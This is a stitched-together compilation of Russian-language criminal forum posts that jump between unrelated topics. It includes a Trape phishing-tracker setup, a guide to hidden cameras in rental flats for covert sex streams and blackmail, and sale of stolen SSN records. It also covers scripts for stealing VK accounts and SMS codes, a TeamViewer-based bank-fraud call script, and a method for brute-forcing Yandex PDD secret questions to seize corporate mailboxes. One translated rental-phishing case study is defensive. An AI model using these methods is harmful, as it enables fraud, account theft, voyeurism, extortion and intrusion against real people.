А теперь время ох#$тельных историй. Данный способ хоть и не является пабликом, но работают с ним множество людей, из «белых» шляп, твиттер их я палить не буду, дабы не привлекать внимания к себе и к ним. Код использованный в статье и способ полностью мой, я не разбирался в тонкостях их заражений, но метод распространения придумал совсем не я, а именно те кто пишет статьи о реверсинге школьных стиллеров, со скриншотами переписок из телеграмма. Троянят вообщем школьников (таких как я), потом сливают у себя в ленте их деятельность. Не такие уж вы и белые ребята Хотя думаю у них выбора зачастую и нет изучать инфосек, кроме как самим не погружаться в эту работу и среду.
Так что метода работает и вам желаю быть такими же классными как и всегда
Вот этот говнокурс продавали за 75к, краткое описание от продаванов:
Онлайн-Платформа
от Гуру Darknet’a, в которой ты научишься:
- Настраивать и использовать вирусы
- Превращать загрузки в деньги
- Разбираться в вирусах
- Обходить антивирусы
- Создавать и контролировать ботнет
- Управлять машиной после заражения
- Зачищать следы после атаки
Click to expand...
Полное описание
тут.
[CLIKE]Ссылка
pass:xss.is[/CLIKE]
Trape – это инструмент, написанный на Python, который может помочь отслеживать клиента после использования фишинговой атаки. Когда жертва нажимает на фишинг- url, инструмент фиксирует IP-адрес, местоположение и сеансы клиентских сайтов некоторых популярных веб-сервисов. Некоторые известные поддерживаемые веб- сервисы:
Полученные результаты можно увидеть через панель управления в веб-браузере.
Установка Trape на Linux OS
Установить Trape можно на любую операционную систему.
Установка осуществляется очень быстро, как любой другой скрипт. Необходимо
выполнить следующие команды в Terminal:
Code:Copy to clipboard
git clone https://github.com/boxug/trape.git
После того, как файлы будут склонированы на ПК, нужно установить список утилит, которые потребуются для корректной работы скрипта:
Code:Copy to clipboard
cd trape
pip install -r requirements.txt
Запуск Trape – GUI для фишинга / отслеживания
После того, как инструмент и необходимые библиотеки будут успешно установлены,
Trape можно запустить, используя следующую команду.
Code:Copy to clipboard
python trape.py -h
Команда не только запускает инструмент, но также предоставляет список параметров, которые могут быть заданы в качестве аргумента в командах. Как упоминалось ранее, Trape работает по принципу первого использования фишинговой атаки. URL-адрес должен быть клонирован и разделен, чтобы уловить жертву клиента. Клонированный URL-адрес можно получить, используя следующий формат команды.
Code:Copy to clipboard
python trape.py --url --port
Для демонстрации мы можем клонировать google.com, используя номер порта 80 на локальном хосте. Это может быть достигнуто с помощью следующей команды.
Code:Copy to clipboard
python trape.py --url https://google.com --port 80
Вышеуказанная команда генерирует три параметра, а именно: URL-адрес фишинга, URL-адрес панели управления для отслеживания жертв и профайла для входа в панель управления.
После создания URL-адреса приманки его можно отправить жертве по электронной почте или любым другим соответствующим способом. Инструмент ждет, когда жертва щелкнет по URL-адресу приманки. Результаты сохраняются в панели инструментов скрипта, к которой можно получить доступ, используя ссылку на панель управления и сгенерированный ключ доступа.
Как только жертва нажимает на URL-адрес, Trape фиксирует IP-адрес жертвы,
местоположение и любую текущую сессию в веб-браузере.
взято из (с) интернетов
Сама идея пришла мне в голову в очень далёкие времена, когда в перерыве между
оков брака, да и во время, я снимал квартиры для приятного времяпровождения с
красивыми девочками. Естественно, интеллектом мои "собеседницы" не отличались.
Тогда "Дом 2" был на пике популярности, поэтому девчёнки, в перерыве на восстановление сил, просили переключить телевизор именно на этот бред. Смотреть на это было реально мерзко, поэтому меня, да и весь остальной мужской пол, эта х#йня могла заинтересовать только прямой трансляцией откровенного, не наигранного секса, при том, чтобы "герои" не знали, что их снимают. И не скачанные с интернета ролики с цензурой и видео только самого акта, а всё подробно и поэтапно, и живую. Тогда и поглазеть можно.
Прокрутив эти мысли в голове, у меня созрела идея, и я начал искать стримы с подобным контентом. К моему удивлению, спрос на такие услуги оказался просто колоссален.
Суть
Как организовать стрим с хорошим сексом и срубить на этом кучу бабла? Давайте
по-порядку. Для начала ищем дешевую квартиру с телевизором старого образца.
Почему дешёвая квартира?
Постоянный движ, большой спрос у маргинальных слоев населения, следственно, это полностью исключает вероятность того, что клиенты придут с детектором скрытых камер. У них просто нет денег на такие девайсы. Да и хозяева тоже не особо будут этому придавать внимание.
Почему телевизор старого образца?
Для того, что бы мы могли в него впихнуть всё, что мы задумали. Фото хаты обычно выкладывают в объявлении и модель телека мы будем знать заранее.
Мой опыт
Я на тот момент использовал телефон на Android с небольшой переделкой. Отпаял камеру, поставил шлейф сантиметров 30 между камерой и материнкой. В незаметном месте на телеке сделал маленькое отверстие, в решётке под динамиками. Перед отверстием приклеил камеру. Материнку разместил подальше, чтобы только не фонило от ТВС или ТДКС. Так же купил пару мощных аккумуляторов, спаял параллельно для повышения емкости. С зарядки снял корпус и светодиод, подсоединил к 220V, которые взял с платы ящика. На телефон поставил пароль, чтобы не сняли данные сервера, на который мы будем вести трансляцию (на случай, если спалят).
Проверил всё на работоспособность, затем отстегнул дисплей. Без дисплея телефон работал в разы дольше. Если даже кто-то вытянет вилку ТВ из розетки, то до следующих клиентов, а скорее сами хозяева вставят при уборке, должно хватить заряда батарей.
Реальность
Сейчас все в разы проще. Тогда связь 3G была дорогая и с телефоном повозиться нужно было порядочно, чтобы всё работало всё как надо. Теперь связь копейки, а вместо смарта есть уже готовые варианты камер.
Монетизация
Самый простой и относительно безопасный способ - продавать эксклюзивное видео
платным сайтам вуаеристов таким как этот. Если
поискать, то таких сайтов можно найти очень много. И если видео удачное, то и
покупать они будут с удовольствием.
Но все это покажется копейками, если у вас получится организовать доступ к лайв-стримам. Ищите сайты с платным доступом к скрытым камерам типа LIVE CHATS, только не с моделями, а с доступом к HIDDEN CAM.
Настройка трансляции
В первую очередь изучите азы кибербезопасности, далее настройте трансляцию через дедик. Единственное, что там потребуется - следить, когда жертвы заселятся в квартиру и только после этого подключать эфир, чтобы дрочеры не глазели в пустой экран, и Ваш рейтинг не падал.
Работайте только по буржу, еще лучше по азии, тогда вас точно не найдут. Самый минимум который вы будете получать при таком раскладе - от 500 долларов в неделю.
Максимально черный вариант
Предупреждаю, скорее всего это приведет вас в тюрягу, поэтому подходи только для самых отчаянных. К теме очень легко подключить шантаж, findface в помощь. Профиты вырастут в несколько раз.
Итоги
И на последок, перед вами всего лишь идея для заработка. Не занимайтесь этой
х#йней друзья, иначе очень сильно разочаруетесь в человечестве.
Почему за нами следят?
Блин, каждый день хожу на улице и наблюдаю за тем как на каждом углу стоит
камера которая снимает вас, все люди ходят в телефонах не подозревая то что за
ними уже тоже следят, неужели ОНИ и вправду думают что смогут нас
контролировать???
Пиши в ЛС если заинтересован
Ждем именно ТЕБЯ
Спорим, что я о тебе? Спорим, что мне даже не нужно твое одобрение, когда я
пересказываю тебя? Спорим, ты меня знаешь?))
Когда ты молод, тебе кажется, что весь мир у твоих ног. Тебе кажется, что время работает на тебя, а трава действительно стимулирует твой мозг на новые свершения. Или расслабляет. Кому что. Но у каждого, как ни крути, будет своя правда. И она будет верной. Я даже не претендую на то, чтобы ты мне верил. А вот я верю тебе, понимаешь?
Я верю в то, что завтра ты проснешься другим. Я верю в то, что сегодня у тебя было слишком много дел, чтобы успеть сделать самое главное. Я верю, что тебе тяжело, пока ты живешь с родителями. Когда съедешь на съемную - начнешь дышать полной грудью, я верю. Еще я верю в то, что ты особенный, но обстоятельства говорят тебе: "Стой, парень. Тебе пока рано, набирайся опыта"
Опыта в чем твою мать?) Но я верю, что ты прожуешь и это, замотивируя себя видосами с ютюба и мотивационными книжками, где написано не сдаваться. Я верю в то, что у тебя получается всё, за что бы ты не взялся, но ты умеешь и знаешь так много, что глаза разбегаются, а определиться сложно: определиться с призванием, определиться со своей дорогой. Да определиться хотя бы с чем-то уже!!
Сколько тебе? 17-19? Может 23?В сущности, какая к черту разница? Я смотрю на статьи в телеграме, а там по фен-шую добавляют оглавления после каждого абзаца, картинки, чтобы тебе было проще читать. Все сводится к упрощению, к шаблонности. Тебе 20 лет, а тебе необходимы картинки, чтобы прочитать текст? Серьезно?
А может тебе еще петухов на балкон закинуть, чтобы просыпалось проще? Слушай, да я не вредничаю, я верю, что тебе нужны обстоятельства, детали, атрибуты, положительные моменты, чтобы ты что-то сделал. Я верю. Сложно взрастить семя, когда у тебя ни удобрений, ни воды. Да только с чего ты взял, что твоему семени это нужно?
Я верю тебе во всём, потому что мы - люди. Мы все одинаковые. Если успех для каждого, это примерно одно и то же, то идоедая "последний х#й с солью" мы все будем чувствовать одно и то же. Это очевидно. И я знаю, каково тебе просыпаться с мыслью, что сегодня ты начнешь всё заново. И я знаю, как тяжело тебе, что заново ты не начал.
Мне не нужно твое одобрение, помнишь? Я лишь хочу дать тебе понять, что ты в этом мире не один. Твоя мама не понимает твоих проблем. Отец - подавно. Рассказывал им, что прое*ал свои последние деньги на ставки? Или может ты спрашивал у них совета, вложить ли деньги в раскрутку счета? Ахахха) Ну нет же. Оттого, ты чувствуешь себя одиноким, но с полной уверенностью того, что сегодня ночью ты поднимешь деньги.
Я играл в покер. Ставил на футбол. Кидал деньги на раскрутку счета в якобы проверенную контору. Снова играл в покер. Протёр жопу до дыр, одним словом. Везде. Пытался. Взять. Своё.Но кто сказал, что это моё? Слушай, на всей этой херне можно заработать, если ты варишься в этом не первый год.
Ну а если нужны деньги здесь и сейчас?
Click to expand...
Если нужны деньги здесь и сейчас, то доверяй профессионалам. Многие этим правилом принебрегают. А возможно, даже не в курсе, кто у нас профессионал. Возьмем, к примеру,. Насколько я знаю, он уже не один - там целая команда. Да, они торгуют на бирже и помогают каждый день любому с деньгами, кто к ним обратится. Но дело не в этом. На их примере можно понять, что чуваки просто решили стать финансово независимыми, подняли жопу и стали работать на себя, на свой успех.
Ты, конечно, можешь подписаться на канал, ловить их сигналы и бла-бла-бла, это всё понятно. Я мог и не говорить, это и так очевидно. Уже, по-моему, все знают, что они профи в своем деле. Поэтому, кстати,они почти не заказывают рекламу, потому что их имя уже работает на них! Это очень важно. Запомни этот момент.
Каждый день появляются фейк-трейдеры, но не доверяйте им свои деньги.
Зачастую, это просто развод. Не ведитесь!
Богатый Трейдер же проверен временем и тысячами довольных клиентов.
Так вот.. они обычные ребята из обычных городов, когда-то обычных квартир. Как
и ты. Но они взяли себя в руки и сделали деньги в ТГ, обладая при этом,
поверхностными знаниями как это делается. **Сейчас - они знают всё, и даже
больше.
Что тебе мешает стать как они? **У вас по две руки, две ноги и одна голова. Голова, кстати, твоя ничем не уступает. Так давай, действуй! Проблема в том, что многие не берут на себя ответственность за свою жизнь. Согласись, тебе просто лень её брать, не хочется, впадлу или вообще "я взял на себя ответственность, просто не получается"
Да, я это слышал миллионы раз, и так говорили ребята, которые оставались и остаются на дне) Давай берись уже за голову, мне хочется изменить чью-то жизнь и, надеюсь, что сегодня изменил уже твою. Ну или хотя бы надломил
Еще раз линкану для первого заработка подойдет идеально, акак почуешь деньги, мотивация попрёт изнутри! Я тебе гарантирую. Но если ты переживаешь, что и там у тебя ничего не получится , то тут уже проблема в тебе, мужик) Не получится? Значит не получится. Я верю тебе, у тебя нигде и никогда не получается. Я верю. Я вижу. Но с этой проблемой, уже не ко мне.
Тема такая
Зная номер тел и имя с фамилией как подробно узнать о человеке?
Я только нашёл во всех соц сетях человека,и узнал когда пошёл в школу где
работал и т.д
Но в инсте меня не добовляет... Хочется фотки все глянуть
Недавно я стал жертвой (к счастью, неудачной) фишинговой атаки. Несколько
недель назад я бродил по сайтам Craigslist и Zillow: я хотел арендовать жилье
в районе залива Сан-Франциско.
Мое внимание привлекли симпатичные фото одного местечка, и мне захотелось
связаться с арендодателями и узнать о нем поподробнее. Несмотря на мой опыт в
качестве специалиста по безопасности, я не понимал, что со мной общаются
мошенники, вплоть до третьего письма! Ниже я подробно расскажу разберу кейс
вместе со скриншотами и тревожными звоночками.
Я пишу это, чтобы проиллюстрировать, что хорошо подготовленные фишинговые атаки могут выглядеть очень убедительно. Безопасники часто рекомендуют обращать внимание на грамматику и оформление, чтобы защититься от фишинга: якобы у мошенников слабое знание языка и небрежное отношение к визуальному оформлению. В некоторых случаях это действительно работает, но в моем кейсе не помогло. Самые изощренные мошенники пишут на хорошем языке и создают иллюзию соответствия всем писаным и неписаным правилам, стараясь оправдать связанные с этим ожидания жертвы.
Первые письма: беспокоиться в общем не о чем
В объявлении на craiglist было сказано, чтобы все заинтересованные лица звонили по телефону. Однако самого номера телефона там не оказалось. Я подумал, что это произошло по недосмотру, так как многие объявления грешат тем же. Тогда я решил написать арендодателю и попросить у него номер, а также сообщить свой.
В ответ тот написал, что я могу связаться с ним по email: [davidgrinde@engineers-hibernia-chevron.ca](mailto:davidgrinde@engineers- hibernia-chevron.ca). Вы могли бы подумать, что уже это должно было мне показаться странным. Однако поиск жилья на таких ресурсах часто связан с каким-то заморочками с номерами телефонов, почтовыми ящиками и странными обходными маневрами. Поэтому я просто написал письмо на этот email и получил такой ответ:
Арендодатель задаёт вполне типичные вопросы: «Когда планируете заехать?»,
«Сколько людей с вами будет жить?», «Каков ваш годовой доход?»
И тут я не догадался, что общаюсь с мошенниками
Арендодатель сообщил, что он часто и подолгу находится далеко от дома, а теперь будет в отъезде целых два года. Мне показалось это немного странным, но у всех свои обстоятельства, мало ли что. Тем более, многие арендодатели, с которыми я общался, говорили то же самое. А вопросы, заданные мне в письме, показались вполне уместными. Так что я продолжил общение и ответил на них.
Далее я получил такое письмо:
«У меня тут нет мобильной связи, я имею доступ только к своему рабочему
компьютеру. Мы продолжим общаться по email, если это ок для вас»
«жилье хотят посмотреть 3 человека. У меня нет времени встречаться с каждым из
вас. Я дам вам ссылку… там вы сможете забронировать себе место (предоплату за
1 месяц аренды, а также возмещаемый депозит). Если вы раньше не пользовались
Airbnb, это достаточно легко...».
Тревожные звоночки начались именно здесь. Получив это письмо, я уже на 80-90% был уверен, что это мошенники
Первый тревожный звоночек: «У меня тут нет мобильной связи, я имею доступ только к своему рабочему компьютеру. Мы продолжим общаться по email, если это ок для вас». Второй — странное появление Airbnb в нашей беседе.
Почему они хотели, чтобы я заплатил именно через Airbnb?
Третий звоночек — это слишком большое количество фотографий, подтверждающих,
что это реальный человек. Но если личность не фейковая, то зачем так стараться
убедить меня в этом?
Однако Airbnb меня реально сбил с толку. Тут я уже начал сильно подозревать,
что общаюсь с мошенниками, но все же, не был уверен. Я понимал, что их
мошенничество не сработает, если я забронирую жилье через Airbnb. У Airbnb
хорошо отлаженная процедура разрешения споров и я быстро смогу доказать свою
правоту и вернуть деньги.
Я показал объявление другу и он заявил, что это не афера. Нам стоило заключить пари, потому что в итоге прав оказался я. Но тогда я решил проверить, мошенничество это или нет и поэтому все-таки попросил ссылку на Airbnb.
Попросили подождать. Подождать чего? И зачем-то посоветовали мне самостоятельно отыскать на Airbnb их объявление. Это тоже было довольно странно, и я не видел в этом никакого смысла. Но стоп… Я не смог найти его на Airbnb. И тогда я попросил ссылку еще раз…
Они прислали ее. Она выглядела как настоящая и имела домен airbnb.com. Но так как это была не первая моя охота на фишинговых аферистов, я проверил реальный адрес ссылки в текстовой версии письма (URL Destination). Как говорится, найдите два отличия:
Что и требовалось доказать!
Так и есть. Это фишинговая ссылка. Давайте посмотрим.
Этот скриншот сделан через несколько дней после моего первого расследования, тогда Chrome не успел пометить этот URL как опасный. Фишинговый сайт сделан просто на отлично! Он интерактивный и выглядит убедительно. Поэтому я легко могу допустить, что на удочку мошенников могут запросто попасть те, кто не усомнится в происхождении URL.
Я не проверял кнопку Request to Book, но уверен, что она бы привела меня на фишинговую страницу, где данные моей карты были бы успешно украдены. Спасибо, может в другой раз.
Почему я остался так впечатлен?
Команда мошенников — а я уверен, что это была команда — проделала огромную работу с высоким уровнем детализации. У них идеальный английский, их письма выглядят профессионально, их фишинговый сайт выглядит как Airbnb. С адреса engineers-hibernia-chevron.ca настроен редирект на hibernia.ca. Это вызовет доверие у тех, кто захочет проверить их домен.
Еще больше я впечатлен их тонкими психологическими уловками. На каждом этапе взаимодействия со мной они оставляли один неясный момент, который я должен был уточнить у них, чтобы дальше двигаться к своей цели. Намного проще почувствовать что-то неладное, если вопросы задают вам. А если вопросы задаете вы, то становится намного труднее продолжать спрашивать их о том, что вам кажется странным. Потому что вы и так уже спросили достаточно и как будто отнимаете время у занятых людей.
Сначала в их объявлении не оказалось номера телефона, и я был вынужден попросить его. Затем они направили меня на сайт Airbnb, и я попросил ссылку. Но в первый раз они не дали ее, поэтому я вновь был вынужден просить. Все это было спланировано заранее.
Во время общения они также упоминали, что другие люди тоже интересовались их жильем, поддерживая правдоподобное ощущение ограниченного времени, когда я должен принять решение. Наконец, использование Airbnb в качестве фишингового сайта было разумным, поскольку создавало впечатление доверенного посредника. Сначала я был реально сбит с толку, потому что не мог понять, как они планируют украсть мои данные. Если бы они просто запросили информацию о банке или кредитной карте на начальном этапе общения, обнаружить и раскрыть их аферу было бы легко.
Автор оригинала: [Jeffrey Ladish](https://jeffreyladish.com/anatomy-of-a-
rental-phishing-scam/)
перевод @ owlnagi
.10 ea for these SSN | DOB | NAME | ADDRESS | PHONE
way;SPRINGFIELD;97478;OR|;5413 - Pastebin.com ](https://pastebin.com/5D94S3ZS)
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
pastebin.com
========================
.20 ea for these EMAIL | NAME | SSN | DOB | SSN | ADDRESS | DL # - STATE - EXP | JOB | CURRENT LOAN BALANCE | CO-SIGNER NAME, DOB, SSN, ADDRESS, JOB
"Doreen", - Pastebin.com ](https://pastebin.com/WZZqZvG3)
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
pastebin.com
============================
.10 ea for these NAME | DOB | Sex | SSN
Pastebin.com ](https://pastebin.com/YS3SPicA)
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
pastebin.com
Many more bases from medical, to corporate employee records and hospital records all kinds of data available. Bulk deals for cheap always. telegram@lettersandnumbers
Начну пожалуй сразу о СИ, методов давления на человека достаточно много и все они сходятся к инстинктам, все желания и действия это способы реализации тех или иных инстинктов. Сама по себе ложь является универсальным инструментом, добавим к ней технические навыки позволяющие облегчить процесс получения (паролей например) и это становится самым настоящим эксплоитом, я бы даже сказал биоэксплоитом. Очень важно в таком деле первое впечатление о вас, вспомним те же эксперименты над пользователями соц сетей, когда людей знакомили без фотографий, и каких либо данных о них, люди начинали общаться чаще и быстрее выдавать данные о себе ( не логины и пароли конечно ) как зовут где живу и тд. Потому-что они не знают кто перед ними, и им хочется узнать, узнать социальный статус человека напротив, рассказать о себе (а вдруг там какая то крупная шишка, я же не знаю). Так-вот, первое впечатление очень важно. Рассмотрим два метода реализации нашего плана. Первый метод это мы навязываемся к человеку, но делаем это предлагая ему то что он хочет, расскажу пример из своей жизни, мой друг занимается рисованием, у него отлично это получается, и я решил проверить методы подхода к нему. Первый подход был банальный фотоконкурс, он сразу понял в чем дело и послал меня. Второй же я хорошо подготовил и предложил ему раскручиваться на моем сайте, рисовать и зарабатывать на этом, общался с ним на эту тему, и самое важное говорил что это не за просто так, то что я буду брать процент с продаж его рисунков, это нужно что бы откинуть сомнения (халява так не бывает) ну и в итоге получил его логин и пароль заставив авторизоваться через вк потому-что система авторизации не работает временно. Второй подход это мы нужны жертве, сразу к примеру. Мы каким то образом узнали номер телефона, начинаем спамить на него смсками, благо сервисов позволяющих это делать более чем достаточно, а код для автоматизации на том же языке GO занимает строчек 10. Потом же звоним жертве, и говорим что то вроде "Здравствуйте я (сотовый оператор мтс.билайн.и тд.) мы заметили что на вашем номере проявляется подозрительная активность. (далее жертва начинает рассказывать что что-то происходит и тд) предлагаем ей наши услуги, антивирус или еще что, и даем дорогу на ваш файл, ссылку." Про операторов я сказал для примера, суть подхода это не меняет, мы создаем обстоятельства (как правило неблагоприятные) что-бы жертва нуждалась в наших услугах по их устранению.
А теперь о аккаунтах, первый способ банальщина, но не каждый пользуется, и знает, ищем сервис для онлайн смс активации, берем номер, заходим на страницу входа вк (например) и тыкаем на забыл пароль, просят номер, вводим, приходит смс, просят фамилию, ищем через импорт контактов, вводим, аккаунт наш, так же и фейковые кошельки киви можно достать, почти любой аккаунт который позволяет восстановить доступ таким способом, как правило это защищается привязкой почты, но с недавних пор вк не отсылает коды на почту, но там можно запретить импорт контактов. Работает конечно не всегда, но достать аккаунтов можно.
Второй способ более изощренный но и шанс на успех тут более высок. Для начала нужно найти страницу какого-нибудь школьника, можно искать в группах по раздачам аккаунтов, пишем мол вы выиграли и что бы получить подтвердите свою личность, мы отправим вам на номер код и вы должны написать его сюда, тогда получите аккаунт, получаем номер, еще можно выудить айпи и вырубить интернет на время, что бы шансы возрасли еще больше, но обычно хватает номера, и начинаем бомбить его смсками (или если субьект совсем не алё то можно зарегистрировать страницу и он скажет вам код) и что бы спам прекратился просим его назвать еще один код, который нужен нам для регистрации страницы. Вообще такие аккаунты могут восстановить, но для рассылки они подходят отлично, для постоянного аккаунта можно заставить купить виртуальный номер, он дешевый и стоит рублей 20 от силы, и зарегистрировать там аккаунт.
Всем спасибо за внимание, заранее извиняюсь если чтиво душное, писал так сказать от души. Кому интересно могу добавить три книги для улучшения навыка СИ, читаются очень легко и увлекательно.)
Приветствую.
Для получения профессионального статуса придется сделать несколько шагов.
Эта схема подойдет тем кто живет в областных городах РФ т.к Рокетбанк делает
доставку только в них.В провинции не доставляет.
Итак к самой схеме.
Нам потребуется карта Рокетбанка.Думаю у большинства она уже имеется если нет
то заказываем по ссылке реф - https://vk.cc/7op57D не реф -
https://rocketbank.ru/
Вписываем свои данные. ВАЖНО:Номер телефона указываем тот на котором у вас
киви кошелек иначе ничего не выйдет.
Придумываем кодовое слово и адрес где вам удобно будет получить карту и
время,вводим код из смс.
После получения карты если нет еще киви кошелька ПОВТОРЮСЬ создаем его на тот
же номер на котором у нас карта.
Качаем приложение Рокетбанка.Регаемся.
Активируем карту.Для активации на нее надо кинуть 50-100р не больше
Далее идем по скринам
заходим в киви кошелек ждем минут 5 видим наш статус
Ждем еще минут 10-20 заходим в приложение и опять по скринам
Вводим смс код
Вуаля у нас Профессиональный кошелек QIWI
Добрый день.
В поиске идеи по выманиванию смскодов на пополнению платежек с онлайнов.
Мне нужно принимать одну смс. В смс будет указываться сумма перевода итд.
По разводке хочу попробовать вариант, когда делаю пополнение, улетает смс, сразу звоню холдеру от имени Сб или манагера, узнаю совершал ли он мою транзу, получаю отрицательный ответ и прошу смс для отмены транзы. Какие еще есть мысли? Как вариант, звонить и сообщать что другой клиент банка случайно послал деньги, нужно отменить транзу и просим код. Так же во время прозвона использовать данные с ака, доб, имя фамилию итд. Возможно использовать инфу о ипотеке или страховки с ака. Есть ли у кого практика работы когда нужно 2 смс? Готов обменяться идеями и статой. в лс.
Если кому-то попадались статьи или книги по телефонному скаму, си. поделитесь плз.
Подмена DNS более не актуальна в плане реализации редиректа сайтов...
Есть свежие мысли реализации подобного рода доступа?
До этого пользовался api одного знакомого , но больше его нет.
Подскажите что-нибудь по разумной цене работающее с kz номерами.
Всем добрый вечер
Гулял значит по форумам и наткнулся на следующую схему
[CLIKE][/CLIKE][CLIKE]
[/CLIKE]
Далее начал читать отзывы из плей маркета по приложению teamviewer
quicksupport
Понял следующую схему, актуальную судя по всему на сегодняшний день
[CLIKE]1 - Добываем/покупаем БД клиентов СберБанка или любого другого банка. Содержимое должно быть как минимум ФИО+Номер телефона
2 - Звоним через SIP телефонию от номера банка. (например http://xho.ru | Не реклама )
3 - Представляемся службой безопасности, говорим, что была попытка несанкционированного доступа к приложению онлайн банка, нужно немедленно установить антивирус и проверить онлайн банк. Для этого просим в плей маркете, в поиске вбить "Поддержка", скачать приложение первое по списку и продиктовать нам выданный ID (тут мы вбиваем ID клиента и коннектимся к его смартфону) , после этого просим зайти в приложение банка (так как мы видим экран то при входе запоминаем пароль человека)
4 - начинаем отводить тему, спрашиваем не звонил ли кто-то еще, не было ли подозрительных смс якобы от банка И так далее
5 - пока человек занят разговором с нами, мы входим в его онлайн банк и... далее от фантазии зависит, можно просто перевести средства на сбер карту, можно посмотреть данные карты и коннектить её к киви/яндексу, смс мы ведь тоже видим)[/CLIKE][CLIKE][/CLIKE]
Есть бруты банков USA, на выходе получаю валидный лог и пасс. Т.к доступа к мылу ессно нет, то для добавления в платежки и монетизации мата нужен чекинг и роутинг номер. Знаю, что есть конторы которые логин+пасс позволяют это чекать. Помоги плз советом, словом, делом - на своих условиях.
Как можно зная логин и данные почты пп сделать сброс?
Или подобрать пароль?
Просто хуева туча акков но есть доступ только к почте и логину , кто подскажет
поделюсь акками за подсказку ...
Так же в лс поделюсь личной схемой по пп
Очень простой и удобный сайт для фишинга ВК
Можно свободно переделать под свой вкус
да и все это в ознакомительных целях вся ответственность на ВАС
!
пароль xss.is
Что такое Яндекс ПДД и для чего это нужно?
Яндекс PDD (почта для домена) - популярное решение среди небольших организаций
для корпоративной почты. Если вам необходимо менее 1000 учетных записей, то
абсолютно бесплатно вы получаете простой интерфейс администрирования, удобное
API, понятный и красивый веб-клиент для пользователей. Вам не придется
самостоятельно настраивать и размещать SMTP и POP/IMAP сервера (вам даже не
нужно знать что это такое). Яндекс.Почта имеет статус безопасного и
современного сервиса.
В процессе аудита мы часто сталкиваемся с организациями, доверивших почтовую
переписку данному сервису. Настроив корпоративную почту на Яндексе можно уже
не беспокоиться о безопасности переписки. Или нельзя? Я провел небольшое
исследование на эту тему. В первую очередь, мое внимание привлек функционал
сброса паролей.
Особенности восстановления доступа к сервису Яндекс.Почта
При регистрации личного почтового ящика в яндексе существует возможность не указывать номер телефона, а выбрать контрольный вопрос на случай необходимости восстановления пароля. Тему безопасности двухфакторной авторизации через SMS рассматривать сейчас не будем (атаки на SS7, SIM swap и т.д. - это темы для многих исследований), просто примем, что это надежнее метода секретных вопросов.
Использование секретных вопросов снижает защищенность аккаунта, так как ответы на них часто можно найти методами анализа социальных сетей, а порой они очевидны. В Яндекс отлично это понимают) Каждый раз при авторизации сервис настойчиво предлагает привязать номер телефона. Через короткий промежуток вы не сможете войти в свой аккаунт, не активировав двухфакторную авторизацию, поэтому личных почтовых аккаунтов с восстановлением пароля через секретный вопрос практически не существует.

Вроде все хорошо, а что не так с Яндекс ПДД?
Отличие аккаунта зарегистрированного через Яндекс PDD от личной Яндекс.Почты в
том что, сервис лояльнее относится к секретным вопросам. Да, периодически вам
будут предлагать привязать номер телефона к учетной записи, но вход до момента
активации двухфакторной авторизации не заблокируют. Говоря о Yandex PDD мы
обычно имеем дело с корпоративными аккаунтами. Паттерны поведения при работе с
рабочими/личными аккаунтами имеют отличия: часто пользователи опасаются
компрометации личных учетных записей гораздо больше. Это психологический
аспект: безопасность моей почты - моя проблема, а рабочей - зона
ответственности администратора. Многие четко разделяют рабочие и личные
контакты и не хотят использовать личный номер телефона для привязки к
корпоративной почте, а служебный мобильный телефон есть не у каждого. Вместо
телефона можно привязать дополнительный адрес почты. Но так делают не все.
Практика показывает, что корпоративные учетные записи защищенные секретным
вопросом - не редкость. Не редкость и совсем простые вопросы.
Яндекс предоставляет 10 попыток для ответа на секретный вопрос, а потом
блокирует на 1 час:
Я выяснил, что блокируется IP-адрес с которого производились попытки сброса пароля, поэтому заменив выходную ноду TOR или VPN сервер мы можем продолжить подбор ответа. Даже куки чистить нет необходимости. Выход с других устройств и браузеров после удачного сброса пароля опционален (и отключен по умолчанию). Это значит, что после сброса необходимо как можно быстрее удалить сообщение о смене авторизационных данных. Если пользователь не успеет прочитать его - факт компрометации почтового ящика останется незамеченным длительное время. В реальных условиях - около двух недель я сидел на ящиках одновременно с их владельцами, пока они не заметили, что их пароль не подходит.
Применение в реальной жизни
Как определить, что домен использует Яндекс ПДД? Самый простой способ - воспользоваться службой DNS. Каждый домен имеет MX-запись, она необходима для маршрутизации почтовых сообщений, передаваемых по протоколу SMTP. Определяем SMTP-сервер, использующийся для приема почты:
Bash:Copy to clipboard
dig MX domain +short
10 mx.yandex.ru.
Если в ответе видим mx.yandex.ru - значит в организации используют PDD. Другого способа пользоваться SMTP Яндекс я не знаю. Во время проведения последнего аудита из открытых источников я выявил 78 почтовых учетных записей работников организации. 18 из них были защищены секретным вопросом. Мне удалось доступ к 5 почтовым ящикам. 1 из учетных записей принадлежала администратору, ответственному за приобретение и оплату VPS. В письмах содержались параметры авторизации к различным серверам компании. Админы были очень удивлены, когда узнали что их взломали через Яндекс, такой вектор атаки они не ожидали.
Если вам не повезло взять жирную почту с паролями, имея аккаунт сотрудника вы все равно получаете дополнительные возможности для развития атаки. Кроме собственно почты взломанной учетки у вас будет доступ контакт листу (все учетки организации) и Яндекс.Диск (там тоже попадаются интересные файлы).Тут уж на что фантазии хватит: появляется возможность рассылки малвари от доверенного отправителя, можно попытать убедить админов организовать вам удаленный доступ к сети компании и т.д.
Реальные секретные вопросы, попадавшиеся при пентестах:
1. "Мой почтовый индекс";
2. "Моя первая машина";
3. "Название компании";
4. "Девичья фамилия матери" - да, и такая банальщина тоже встречалась).
Получить доступ к таким учетным записям не составляет труда. Даже если ответ обладает некоторой энтропией (т.е. необходим разумный брутфорс), процесс вполне возможно автоматизировать меняя IP-адрес каждые 10 попыток и используя сервис решения капч.
Что еще кроме сброса паролей?
Во время другого аудита в настройках взломанного веб-приложения присутствовал токен администратора почтового домена (в административном разделе был функционал взаимодействия в Яндекс PDD). Данный токен позволяет производить любые действия с почтовыми ящиками посредством предоставляемого API. Можно получить список учетных записей, сбросить пароль на любой из них, удалить, создать. API очень простой и имеет хорошую документацию. Таким образом после взлома сайта получен приятный бонус в виде доступа ко всей корпоративной переписке.
Токен администратора - очень чувствительная информация, которую можно попытаться поискать в репозиториях, на pastebin и т.д.
Выводы
